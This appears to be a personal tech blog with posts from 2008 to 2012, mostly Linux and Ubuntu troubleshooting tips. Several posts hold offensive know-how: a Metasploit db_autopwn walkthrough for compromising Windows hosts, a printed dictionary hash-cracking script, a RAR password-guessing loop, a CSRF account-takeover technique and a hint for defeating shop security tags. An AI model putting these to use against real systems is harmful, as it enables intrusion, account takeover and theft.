The Grey Hats

Network Thumbnails in Ubuntu

2012-02-14T11:56:00.000Z

Just found this out as a cure for a little annoyance of mine, not seeing thumbnails of images/files over network shares.

goto Nautilus > edit > preferences > preview
and change thumbnails to Always rather than Local Only.

Another small problem in life fixed!

3d Rep-rap printer build (phase 2)

2012-01-27T21:40:00.000Z

Thought I would share the current state of the 3d Rep-rap printer I am building... z-motors installed along with Z-guides, the Y axis wood bed (the Z motor wires are sitting on it) is also installed now and everything is now tightened up and secure - the weight has pretty much trebled too!

ATM card skimmer (real)

2012-01-21T16:41:00.000Z

Well as I am being all photographic today, I thought I should get some photos up of the ATM I aquired from some friends who found it on an ATM machine in Oxford Street London (they contacted the police but they didnt seem to care - nice!) So after some months I have it and here it is in its full glory.

Now to try to figure out how it works and get into some proper hardware reverse engineering!

Shop anti theft tag (non dye version) taken apart.

2012-01-21T16:19:00.000Z

Did this a while ago and never got round to blogging it.

This is the type im on about. (it was very damaged from removal by monkeys)

Here we see the damaged tag taken apart, you can (hopefully) see the RFID security part in the long area, and the pin (on the right top) and the black part on the left top is the pin retainer.

Here you can see the RFID disassembled on the left, and the pin+ retainer on the right top, using a magnet you pop the pin retainer off and the pin comes free.

I leave it to the reader as an excersise on where to place a rare-earth magnet to dislocate the pin retainer.

Motorola Xoom Android Honeycomb non-mobile web browser setting (fixed)

2011-11-06T18:12:00.000Z

So since buying a Xoom when it was launched one thing has bugged me from the start, its browser would be detected as a mobile device and websites would redirect me to their mobile version - which sucked specially for sites not offering a way to move back to the full site.

It seems alot of people have had this issue so here is the solution.

open the browser and close all the tabs so the browser shuts off, reopen it and click the url bar and type about:debug now click the icon in the top right and goto settings then debug then UAString and select Desktop.

you can now browse like normal people!

ubuntu unity launcher hiding behind windows (solved)

2011-10-20T12:06:00.002+01:00

OK an annoying but that happened a few times now is the launcher and tab-switcher like to hide behind any other window so i cant see them...this is a bug and not the set up behaviour..

so how to solve this without fucking everything your doing up? easy

open a terminal and write

unity&disown

then hit enter and a few screen flicks later - your back in business with nothing lost - AWESOME!!

ubuntu 11.10 upgrade black screen, cant login, wifi button blinking (all solved!)

2011-10-15T23:46:00.000+01:00

So today was full of fail for the new ubuntu 11.10 upgrade....

first snort failed to upgrade and because it was doign an upgrade i had no wifi to send the report which killed the upgrade.....cunts - that was just hte start of problems.

Eventually I got the thing upgraded and was presented with the five dots screen, then a black screen.....nothing...no matter what i did helped.

(solution)
ctrl+alt+1
login
sudo -i
mkdir -p /run /run/lock
rm -rf /var/run /var/lock
ln -s /run /var
ln -s /run/lock /var
reboot

so that fixed the black screen error.....but now i couldnt log in under gui except as guest which to be honest fucking sucked donkey cock!

(solution)
ctrl+alt+1
login
sudo rm ~/.Xauthority
go back to your gui (ctrl+alt+7) and login

so now ive fixed that....next problem!!

I have a HP elitebook 8440p which has an intel wifi, it has a nice touch button/indicator above the keyboard to turn the wifi on and off and also as an indicator (orange off/blue on) but since the upgrade it now blinks when wifi data is sent (all the time...and so its fucking annoying) so how to fix this new feature?

(solution)
echo 'options iwlagn led_mode=1' >> /etc/modprobe.d/wlan.conf
modprobe -r iwlagn && modprobe iwlagn

now im all sorted :)

Installing and getting CUDA to work under ubuntu 11.04 x64 bit

2011-10-14T10:43:00.001+01:00

So I want to play with CUDA in the coming months, getting it to work under ubuntu 11.04 was a challenge in itself specially running x64bit!

so here is how I got it working..

sudo add-apt-repository ppa:aaron-haviland/cuda-4.0
sudo apt-get update
sudo apt-get upgrade

64-bit :
sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

32-bit :
sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

this is really important, if you didnt have nvida drivers already installed, you have to run this
sudo nvidia-xconfig

the next thing to do even if you skipped the last line is to REBOOT - you MUST do this!!

CUDA should now be working :)

-- to get compiling working is another ball ache!
in somewhere like your home folder do the following

mkdir gcc44
cd gcc4
ln -s /usr/bin/cpp-4.4 cpp
ln -s /usr/bin/gcc-4.4 gcc
ln -s /usr/bin/g++-4.4 g++

edit /etc/nvcc.profile to look in the gcc44 directory (give it the full path)

compiler-bindir =/home/xxx/gcc44

now your ready to compile stuff - here is an example
nvcc -c yourprog.cu

that should give you a .o file then run the next
g++-4.4 -lcudart yourprog.o

that should give you a a.out file - just run it as ./a.out

How to get Citrix ICA to work on Ubuntu 11.04 x64bit

2011-10-14T10:40:00.000+01:00

So thought I should write this up so I have a note of it somewhere.

goto http://www.citrix.com/download
select the "receiver" and download the x64 bit version
open a terminal and cd to the download location

sudo dpkg -i icaclient_12.0.0_amd64.deb

open firefox and goto
edit > preferences > applications > Citrix ICA settings file
change this to "use wifca" rather than "use citrix receiver for linux (in firefox)

should work now :)

Minecraft Ubuntu 11.04

2011-08-28T16:43:00.000+01:00

Right to get it working just use this script!

http://pastebin.com/vmVUNnUE

Convert VMware vdk to virtualbox vdi file

2011-08-05T14:01:00.000+01:00

So today I was messing about with metasplot+nessus and needed a confirmed target to check out, and found metasploitable - trouble is its only available as a VDK for vmware

the following can be used to convert it

sudo aptitude install qemu
qemu-img convert /tmp/Metasploitable/metasploitable.vmdk metasploitable.bin
VBoxManage convertdd metasploitable.bin metasploitable.vdi

and your done!

Relaunch!! 2011 baby!

2011-08-05T13:52:00.000+01:00

So after aheadofthetimes.co.uk got shut down by google...I thought I would relaunch the greyhats again.

Just a place to keep techy notes and interesting things - no titties or adult content just plain boring shit to keep my notes online.

virtual box 2.1.0 issues

2009-01-12T10:12:00.002Z

OK so this morning I had some issues with my bridge/tap interface network with the old virtual box, and in my travels around the net I soon discovered that the latest version of virtualbox removes all the hassle of tap and bridge interfaces! wooohoo I think, and swiftly upgrade!

ok so a minute later all my virtual pcs are fucked :(

"Assertion failed: [!name.isNull()] at '/home/vbox/vbox-2.1.0/src/VBox/Main/NetworkAdapterImpl.cpp' (1068) in nsresult NetworkAdapter::loadSettings(const settings::Key&). Please contact the product vendor!."

woopee...seems the new virtual box breaks because if you have virtual machines that are set to use the tap interface, and you upgrade it cant convert the config for you.

So the simple solution is to goto your virtualbox config file eg
/home/freakyclown/.VirtualBox/Machines/windows/windows.xml
and delete everything between and

so that something like this...

becomes something like this

save and restart virtual box and problem should be solved, you will just have to goto the config and select "host" and start the box.

2008-12-15T09:19:00.002Z

My friend NapalmTheElf has launched his own blog over at http://napalmtheelf.wordpress.com/
go visit it for his wit, his charm, his forthright opinion and because I said so!

2008-12-11T08:57:00.001Z

So google released their zeitgeist for 2008, the fastest growers this year are:

1. sarah palin
2. beijing 2008
3. facebook login
4. tuenti
5. heath ledger
6. obama
7. nasza klasa
8. wer kennt wen
9. euro 2008
10. jonas brothers

It's been a big year for the Internet.
From BBC's iPlayer to Facebook to YouTube, many of the top searches in Britain this year have been for our favourite websites. We also see three web-savvy politicians come tops in searches
Fastest Rising

1. iplayer
2. facebook
3. iphone
4. youtube
5. yahoo mail
6. large hadron collider
7. obama
8. friv
9. jogos
10. wiki

Most Popular

1. facebook
2. bbc
3. youtube
4. ebay
5. games
6. news
7. hotmail
8. bebo
9. yahoo
10. jobs

Politicians (Most Popular)

1. gordon brown
2. david cameron
3. barack obama
4. tony blair
5. sarah palin
6. john mccain
7. george osborne
8. alistair darling
9. boris johnson
10. nicolas sarkozy

Recipes (Fastest Rising)

1. cupcake
2. meatballs
3. rocky road
4. crumble topping
5. eaton mess
6. pork belly
7. rhubarb fool
8. lemon posset
9. honey comb
10. beer batter

Finance terms (Fastest Rising)

1. icesave
2. hot uk deals
3. natwest
4. hmrc
5. hbos
6. money saving expert
7. halifax
8. barclays
9. rbs
10. lloyds tsb

Hottest tickets (Fastest Rising)

1. oasis
2. leonard cohen
3. ac/dc
4. the ashes
5. steve coogan
6. sos
7. oliver
8. gladiators
9. tina turner
10. nickleback

Official Gmail Blog: Spice up your inbox with colors and themes

2008-11-20T17:24:00.000Z

G mail launched their new Built in themes today, still haven't shown up yet on my g mail account (even though I was one of the first to get one when they launched)

Official Gmail Blog:
Spice up your inbox with colors and themes

CSRF

2008-10-02T15:36:00.004+01:00

CSRF as it will be known as from now on also known as Cross site request forgery is, in my opinion, an underestimated bug that may occur in quite a lot of web applications.The reason for this is because a lot of web devs assume users will be logged in when they view a given page. So unless they are practically wary will not require a user name and password for every single action the user does. Lets face it, this would get really annoying, really fast and make people less likely to want to bother using this site in the future because of all the hassle.

This attack works by submitting data from an attacker defined form to a form of a target site. After a site I often frequent, decided to fix the XSS bug in one of their pages that I used to annoy people with, I decided to sit down for awhile and try to break it again.

Basically what I did was craft a HTML page hosted on a remote server, that submitted a form using JavaScript. It changed the users email address (which coincidentally resets their password ;)) This code is pretty self explanatory, it runs myform.submit() which submits the form with the name "myform" (duhhhh), stick the target target page in the action parameter and the name of the text box you want to send data for (currently set to targetfield) and its content (newvalue).

Unfortunately blogger won't let me include the html (even when converted to html entities) so here's a pastebin link

http://pastebin.com/f379198b3

Error

2008-08-26T09:33:00.003+01:00

Sorry there was a slight error in the post about the rapid share download/wget thing, I mistyped the cookie name - I have since edited it so it works - sorry for the issues it might have caused!

Rapidshare wget console for linux

2008-08-23T10:25:00.001+01:00

OK so I have a nice connection both at work and home, trouble is both of them have fair usage policys, which basically suck when I want some stuff from rapidshare.

Now this little trick requires a few things, they are:

1, a premium RS account (its cheap you wasters!)
2, You need to log into your account via a normal webbrowser ONCE to set a setting
3, access to a console on a *nix box ;)

OK so first go into your normal browser like FFx or IE and log into your premium account, and goto the settings and select the tick box for "direct downloads", now save that and log out - from here on in you can use console :)

ok now in your console type the following;

wget --save-cookies=rscookie -q --post-data="login=[user]&password=[password]" https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi

obviously replace [user] and [password] with your account details (and minus the []'s)

Now create a list of links you want to download and call it something like "links"

now all you have to do is loop over the urls in the links folder and supply the cookie from earlier

for i in `cat links`; do wget --load-cookies=rscookie $i;done

and your done :D

Occurance...

2008-08-22T10:24:00.001+01:00

It has just occured to me that all the posts that I transfered over from aheadofthetimes.co.uk are in the wrong bloody order, they will have to stay this way because I can not be bothered to reverse the order...so erm from this point downwards its all just for archieving purposes...from this point up its going to be new posts only.

sorry for the stupid error :(

FC

SSH - Shitty Stupid Hack

2008-07-25T11:47:00.003+01:00

Well this week has been rather filled with disaster, one of which is my remote ssh connection got broken. It seemed that if I logged in on the local network all was fine, logging in from the outside world the ssh connection would hang if i got the password right!

Now I have seen this question asked many many times on forums and websites generally the questions are like this

ssh hangs after authentication
ssh crashes from outside
ssh stops when correct password is entered but fine when i get the password wrong
dlink router stops ssh connection
nat breaks ssh connection

and the answers they get are varied and frankly dumb!
they say stuff like update firmware on routers, change MTU, stand on your left leg and hum the theme to neighbours...
well here is the actual answer for thousands of people....ready??

get on your linux box and making sure your root run this command

/sbin/iptables --table mangle --append OUTPUT --jump DSCP --set-dscp 0x0

IRC for the mtv generation

2008-07-25T11:47:00.001+01:00

ok so today ive been setting up IRSSI (which is an irc client) to auto join certain servers and channels when it starts up.

So how do you do this bit of wizardry?...

open irrsi and type the following commands (suplimenting the channels and servers for your own)

/NETWORK ADD Freenode
/SERVER ADD -auto -network Freenode irc.freenode.net 6667
/CHANNEL ADD -auto #blahblah Efnet
/save

you can add as many as you like at a time, also to list what you have do
/[command]list

to remove things do
/[command] remove

apache2

2008-07-25T11:46:00.004+01:00

ok so i had to learn about apache2 virtual hosting today...so here is a quick run down of getting your fo-shizzle working

this assumes you have installed and set up apache2 first

first go into apache folder
/etc/apache2/

in here you will find something like the following

/etc/apache2# ls
apache2.conf httpd.conf mods-enabled sites-available
conf.d magic ports.conf sites-enabled
envvars mods-available README ssl

now the apache2.conf will auto include every config placed in the "sites-available" folder
go into that folder and you will likely see a file called default
this is the file that the server will use for a default website (if someone goes to your server via the ip address in a browser)

so do a cp of that file and name it yournewdomain.com

right now edit the new file yournewdomain.com and change the following bits
first remove the
NameVirtualHost *
bit you only need that on the default file.
then change the bits below to reflect your domainname and your server root folder for that particular website

ServerName www.yourdomain.com
ServerAlias www.yourdomain.com *.yourdomain.com
ServerAdmin webmaster@yourdomain.com
DocumentRoot /var/web

where your document root is a different folder from the standard /var/www

now save that and creat a symbolic link between the sites-available and the sites-enabled folder using
ln -s /etc/apache2/sites-available/yourdomain.com sites-enabled/yourdomain.com

then restart the apache2 server with
/etc/init.d/apache2 restart

and your done :)

extracting URLs

2008-07-25T11:46:00.003+01:00

So recently i had the unenviable task of getting a load of files from a site, not in the mood to do this by hand i thought a simple scripted way would exist...and after a bit of faffing about and someone giving me an idea i ended up with a bloody simple solution!

cat htmlpage.html |grep -o 'http://[^"]*' > urlsinthisfile.txt

ive added spurious fileextensions so windows users can follow along.

its elegant and it works...!

more scripting goodness

2008-07-25T11:46:00.001+01:00

Following on from the post below about extracting files I thought I should share the actual mirroring process too.

Once the urls for the files had been extracted into its own file it was simply a case of

wget -prl0 -i fileofurls

for the project i was working on i needed to repeat the extraction of urls from those files and redo the wget a few times, but in the end it was worth it as I finally had all the files I needed (along with 4000+ other files i didnt want all in seperate directories.

So how do you find all the files you need from multiple directories all with different names and move them to a whole new folder?

well it turns out its fairly simple.
for file in `find . -name "*.pdf" -size +50`; do mv $file ../bar;done

this got me all the files i needed (all the pdfs) i used the size option to make sure i wasnt getting files that just ended in .pdf (which this site had).

kde/kubuntu and samba

2008-07-25T11:45:00.000+01:00

Well it seems that KDE (kubuntu in this case) doesnt work properly with samba shares.
When you try to open an openoffice document via konqueror it will fail with "general internet error occured" which is shit to be honest.

The only current way around this is to mount the share and then open the file from there
smb has been replaced with cifs btw and sudo will fuck stuff up too so do this command.

sudo mount -t cifs -o uid=localusernamehere,username=networkusernamehere //remoteserver/share /mnt/sharemountdir

then goto /mnt/sharemountdir in konqueror and open the file as normal.

so long and thanks for all the fish!

2008-07-25T11:43:00.004+01:00

So I used to love winscp over on windows, but I wasnt sure about what was around for linux that did the same easy copy from remote servers in a nice gui way.
till someone mentioned i should try fish!

open up konqueror and type
fish://user@serverurl

and you should get prompted for your password.

Nice and simple!

*addendum*
As i now use Gnome rather than KDE I found Nautilus doesn't support the fish protocol, however if you select File and then Connect to server you can select ssh as a protocol and do the same thing, alternatively use SSHFS

cracking md5 or sha1 or sha256 or sha384 or sha512

2008-07-25T11:43:00.001+01:00

OK so someone challenged me today to crack a single word encrypted with sha256 in under 80 years.....After I stopped lol'ing i decided to give it a go..

first you need a word encrypted in sha256 - here is a nice one to test with
4e388ab32b10dc8dbc7e28144f552830adc74787c1e2c0824032078a79f227fb

now you need a box installed with python...lucky for me i have that already set up.

so now you need two more things, first a dictionary of words - easy to find online so i wont bother with that...and secondly and most importantly you need a cracker. thankfully for me someone already wrote one :)

http://packetstormsecurity.org/Crackers/aiocracker.py.txt
now incase that gets taken down for some reason im including it here

#Attempts to crack hash ( md5, sha1, sha256, sha384, sha512) against any givin wordlist.

import os, sys ,hashlib

if len(sys.argv) != 4:
print " \n beenudel1986@gmail.com"
print "\n\nUsage: ./hash.py "
print "\n Example: /hash.py "
sys.exit(1)

algo=sys.argv[1]
pw = sys.argv[2]
wordlist = sys.argv[3]
try:
words = open(wordlist, "r")
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
words = words.readlines()
print "\n",len(words),"words loaded..."
file=open('cracked.txt','a')
if algo == 'md5':
for word in words:
hash = hashlib.md5(word[:-1])
value = hash.hexdigest()
if pw == value:
print "Password is:",word,"\n"
file.write("\n Cracked Hashes\n\n")
file.write(pw+"\t\t")
file.write(word+"\n")
if algo == 'sha1':
for word in words:
hash = hashlib.sha1(word[:-1])
value = hash.hexdigest()
if pw == value:
print "Password is:",word,"\n"
file.write("\n Cracked Hashes\n\n")
file.write(pw+"\t\t")
file.write(word+"\n")
if algo == 'sha256':
for word in words:
hash = hashlib.sha256(word[:-1])
value = hash.hexdigest()
if pw == value:
print "Password is:",word,"\n"
file.write("\n Cracked Hashes\n\n")
file.write(pw+"\t\t")
file.write(word+"\n")

if algo == 'sha384':
for word in words:
hash = hashlib.sha384(word[:-1])
value = hash.hexdigest()
if pw == value:
print "Password is:",word,"\n"
file.write("\n Cracked Hashes\n\n")
file.write(pw+"\t\t")
file.write(word+"\n")

if algo == 'sha512':
for word in words:
hash = hashlib.sha512(word[:-1])
value = hash.hexdigest()
if pw == value:
print "Password is:",word,"\n"
file.write("\n Cracked Hashes\n\n")
file.write(pw+"\t\t")
file.write(word+"\n")

just copy that into a file called cracker.py, right now you have that you need to install hashlib into python...this is the tricky bit :)

http://code.krypto.org/python/hashlib/
go and download that and then do the following

sudo tar -zxvf hashlib-20060408a.tar.gz
cd hashlib-20060408a/
python setup.py build
sudo python setup.py install

now cd to where you put cracker.py and type the following

python cracker.py sha256 4e388ab32b10dc8dbc7e28144f552830adc74787c1e2c0824032078a79f227fb dictionary.txt

and you should see somthing similar to below

python cracker.py sha256 4e388ab32b10dc8dbc7e28144f552830adc74787c1e2c0824032078a79f227fb dictionary.txt

15 words loaded...
Password is: spam

Obviously I used a tiny dictionary for this example :)

Word frequencies...from files

2008-07-25T11:42:00.003+01:00

So I was chilling in IRC today when someone was going on about random() and predictability of what people might say, so being kinda geeky, I decided a one liner to extract the said user from the irc log file and then provide a count of all the words in order showing the most likely words a user would say.

so here it is anyway

fgrep "username" \#room.log|cut -f2 -d ">"|sed 's/ /\n/g'|sort|uniq -c|sort -g

you can use this one text files too

cat foo.txt |sed 's/ /\n/g'|sort|uniq -c|sort -g

dictionary attacks on RAR files.

2008-07-25T11:42:00.001+01:00

So I found myself in a unique situation the other day...needing to get into a rar file that was passworded...and not wanting to buy commercial software I decided a quick for loop should do the trick.

for i in `cat en-GB.dic`; do unrar e -p$i file.rar;echo testing $i;done

The .dic file can be any file that has a word per line.
I thought it was rather slow, but then I had a mate loan me some commercial software and found it was checking the same amount of passwords per second. The only alternative to this is rarcrack, which is good enough but it only does brute forcing...which wasnt what i needed!

So for free dictionary attacks on rar files the above one liner should do wonders (be warned any cracking of rar is silly slow!)

Disable "will not be installed because it does not provide secure updates" in firefox

2008-07-25T11:41:00.005+01:00

OK so I was trying to install some addons into firefox and kept getting "will not be installed because it does not provide secure updates" and no matter what i tried it wouldnt damn well let me.

So how did I get around it? simple.

goto about:config in your urlbar
this takes you to the firefox configuration file

now
right click in the list of keys and select "new > boolean"
put in the name as "extensions.checkUpdateSecurity" without the "s

set the value to "false" and your set!
don't even need to restart firefox (but do it if you can just in case!)

Now, because I was being dozy I screwed up and did "new > string" and you cant change the type and you cant delete the damn thing. So here is a simple explanation of how to delete a key from the about:config ***WARNING*** DON'T DO THIS FOR KEYS YOU KNOW NOTHING ABOUT!! **/WARNING**

go and find your pref.js file for me under Linux it was in
/home/freakyclown.mozilla/firefox/i13d0s50.default/prefs.js

find the key you want to delete and just remove it!
restart firefox and your done (as long as you didn't remove something you shouldnt have)

Ubuntu sound lost after upgrade.

2008-07-25T11:41:00.003+01:00

OK so I am so pissed at Ubuntu breaking my audio every fricken time I update my system.

So I dont have to try to remember the steps I have to take to find the right pages here is a simple quick and dirty guide to fixing MY issue. ( I shall link to the page/s for you guys too)

sudo apt-get --purge remove linux-sound-base alsa-base alsa-utils
sudo apt-get install linux-sound-base alsa-base alsa-utils gdm
sudo apt-get install build-essential linux-headers-$(uname -r) module-assistant alsa-source
sudo dpkg-reconfigure alsa-source
sudo module-assistant a-i alsa-source
sudo modprobe snd-intel8x0

then reboot

OK for you lot having the same issues as me your going to need this page but there is an error on the page that tells you to go and look for your ALSA driver - go here insted

Hope that helps alot of people who seem to have this issue with Ubuntu loosing sound after upgrade/reboot

SSHFS

2008-07-25T11:41:00.001+01:00

So today I found a lovely bit of goodness for mounting a remote server as a folder using ssh!

its called SSHFS - and does what I just said.

Heres how to install/use it

first install it
"sudo apt-get install sshfs"

then make sure you can ssh to the remote server
"ssh username@remoteserver.org"

then make a mount point
"sudo mkdir /media/remote"

now mount the remote folder liek so

"sshfs username@remoteserver.org:/var/www /media/remote" -p 22"

two things there..the /var/www/ is the director you want to mount...and the -p 22 isnt needed as the default is 22, but i wanted to show you where to put the port number if you use something different.

and thats it...
just "cd /media/remote" and your sorted!

:)

Hacking for dummies.

2008-07-25T11:40:00.001+01:00

OK so here is a quick and dirty guide to hacking windows boxes.

First lets deal with installing metasploit on ubunutu...

sudo apt-get install build-essential ruby libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems sqlite3 libsqlite3-ruby libsqlite3-dev irb subversion

wget http://rubyforge.org/frs/download.php/11289/rubygems-0.9.0.tgz

tar -xvzf rubygems-0.9.0.tgz

cd rubygems-0.9.0

sudo ruby setup.rb

sudo gem install -v=1.1.6 rails

svn co http://metasploit.com/svn/framework3/trunk/ metasploit

cd metasploit

svn up

./msfconsole

now your in metasploit..

msf > load db_sqlite3
msf > db_create metasploitdb
msf > db_nmap -p 445 [targetipaddy or subnet]
msf > db_autopwn -p -t -e
msf > sessions -l

if you have any sessions you can connect to them using
msf > sessions -i 1
where the number is the session number you want.

done!

Finding files...

2008-07-25T11:39:00.000+01:00

So I came across a cool tip today for finding files that were created past a certain date.

I wanted to find all the files created after a specific file, and the following one liner does just that

find / -newer testfilename -print

if you dont have a specific file then you can make one easily..
touch -t 200807160001 testfilename

Securing Backups

2008-07-24T12:59:00.003+01:00

So a friend of mine over at Kano.org.uk has written a small paper about securing data backups, if you look ever so closely you can see yours truly contributed a tiny bit to it (hence the slight media whoredom of posting it here).

http://www.kano.org.uk/projects/sb/

2008-07-24T12:20:00.002+01:00

I Have decided to move all the IT posts from aheadofthetimes over to its own blog, allowing me to keep my interesting blog separate from the grey hat stuff.

Over the next few days I shall be copying posts I think are relevant to here over.

Freakyclown